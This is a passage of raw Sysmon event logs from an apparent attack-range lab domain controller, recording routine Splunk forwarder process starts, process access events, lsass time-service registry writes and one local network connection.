Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.684{2E1864BB-1776-629A-743D-000000005F02}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x8000000000000000193570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000193569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00d3dd2e) 13241300x8000000000000000193568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8774b-0xf827c1d1) 13241300x8000000000000000193567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87754-0x59ec29d1) 13241300x8000000000000000193566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8775c-0xbbb091d1) 13241300x8000000000000000193565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000193564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00d3dd2e) 13241300x8000000000000000193563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8774b-0xf827c1d1) 13241300x8000000000000000193562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87754-0x59ec29d1) 13241300x8000000000000000193561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:15:18.382{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8775c-0xbbb091d1) 354300x8000000000000000193560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:15.737{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56330-false10.0.1.12-8000- 10341000x8000000000000000193559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1776-629A-733D-000000005F02}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-1776-629A-733D-000000005F02}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.020{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1776-629A-733D-000000005F02}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.021{2E1864BB-1776-629A-733D-000000005F02}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000193598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.989{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1777-629A-763D-000000005F02}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.989{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.988{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1777-629A-763D-000000005F02}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.988{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.988{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1777-629A-763D-000000005F02}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.984{2E1864BB-1777-629A-763D-000000005F02}5736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000193590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.936{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=979EBA8335664B5167340E26F7C103C2,SHA256=9A0E45281078C5FD63566ACE235574FB723FB54D62C18EBB029C67CAA6F03E06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.551{2E1864BB-1777-629A-753D-000000005F02}29324848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1777-629A-753D-000000005F02}2932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:19.304{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1777-629A-753D-000000005F02}2932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 